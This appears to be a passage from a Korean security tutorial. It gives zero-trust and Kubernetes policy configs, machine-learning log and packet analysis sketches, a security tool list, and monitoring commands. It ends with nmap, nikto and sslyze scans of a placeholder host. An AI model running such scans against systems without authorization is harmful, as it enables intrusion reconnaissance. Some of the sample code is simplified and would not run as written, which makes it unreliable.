verify_access(event.code)
|
현대적 보안 구현
제로 트러스트 아키텍처 구현
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| # 현대적 제로 트러스트 정책
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: zero-trust-policy
spec:
selector:
matchLabels:
app: secure-service
rules:
- from:
- source:
principals: ["cluster.local/ns/default/sa/service-account"]
requestPrincipals: ["*"]
to:
- operation:
methods: ["GET"]
paths: ["/api/v1/*"]
when:
- key: request.auth.claims[iss]
values: ["https://trusted-issuer.example.com"]
|
클라우드 네이티브 보안 제어
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| # 쿠버네티스 네트워크 정책
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: secure-policy
spec:
podSelector:
matchLabels:
app: secure-app
policyTypes:
- Ingress
- Egress
ingress:
- from:
- namespaceSelector:
matchLabels:
trusted: "true"
ports:
- protocol: TCP
port: 443
egress:
- to:
- namespaceSelector:
matchLabels:
logging: "true"
ports:
- protocol: TCP
port: 5044
|
보안 모니터링 및 탐지
현대적 SIEM 통합
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| # ML 탐지가 포함된 고급 로그 처리
from elasticsearch import Elasticsearch
import pandas as pd
from sklearn.ensemble import IsolationForest
class SecurityMonitor:
def __init__(self):
self.es = Elasticsearch()
self.model = IsolationForest(contamination=0.1)
def process_logs(self):
logs = self.es.search(
index="security-logs-*",
body={
"query": {
"range": {
"@timestamp": {
"gte": "now-1h"
}
}
}
}
)
# 분석을 위해 DataFrame으로 변환
df = pd.DataFrame(logs['hits']['hits'])
# 이상 탐지
predictions = self.model.fit_predict(df)
return df[predictions == -1] # 이상 항목 반환
|
실시간 위협 탐지
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| # ML을 사용한 실시간 패킷 분석
from scapy.all import *
import numpy as np
from tensorflow import keras
class PacketAnalyzer:
def __init__(self):
self.model = keras.models.load_model('threat_detection.h5')
def analyze_packet(self, pkt):
if IP in pkt:
# 특성 추출
features = self.extract_features(pkt)
# 위협 수준 예측
prediction = self.model.predict(
np.array([features])
)
if prediction > 0.8: # 높은 위협 임계값
self.alert_security_team(pkt)
def extract_features(self, pkt):
return [
len(pkt),
pkt[IP].ttl,
len(pkt[IP].options),
# 추가 특성...
]
|
테스트 및 검증
자동화된 보안 테스트
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| # 종합적인 보안 테스트 스위트
import pytest
from security_tests import *
class TestSecurityControls:
@pytest.fixture
def setup_environment(self):
# 보안 테스트 환경 설정
pass
def test_layer7_security(self, setup_environment):
# 애플리케이션 계층 보안 테스트
assert test_waf_rules() == True
assert test_api_security() == True
def test_encryption(self, setup_environment):
# 암호화 구현 테스트
assert test_tls_configuration() == True
assert test_cipher_strength() == True
def test_network_security(self, setup_environment):
# 네트워크 계층 보안 테스트
assert test_firewall_rules() == True
assert test_ids_configuration() == True
|
보안 모범 사례 및 도구
필수 보안 도구
- 네트워크 보안
- Wireshark: 패킷 분석
- Nmap: 네트워크 스캐닝
- Snort: 침입 탐지
- pfSense: 방화벽 관리
- 애플리케이션 보안
- OWASP ZAP: 웹 앱 테스팅
- Burp Suite: 보안 테스팅
- SonarQube: 코드 분석
- Acunetix: 취약점 스캐닝
- 시스템 보안
- OpenVAS: 취약점 평가
- Nessus: 보안 스캐닝
- Metasploit: 침투 테스팅
- OSSEC: 호스트 기반 IDS
현대적 모니터링 도구
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| # 필수 보안 모니터링 명령어
# 네트워크 모니터링
tcpdump -i any -n 'port 80 or port 443'
netstat -tunap
iftop -P
# 시스템 모니터링
htop
iotop
lsof -i
# 보안 스캐닝
nmap -sS -sV -p- target.com
nikto -h target.com
sslyze --regular target.com:443
|
참고 자료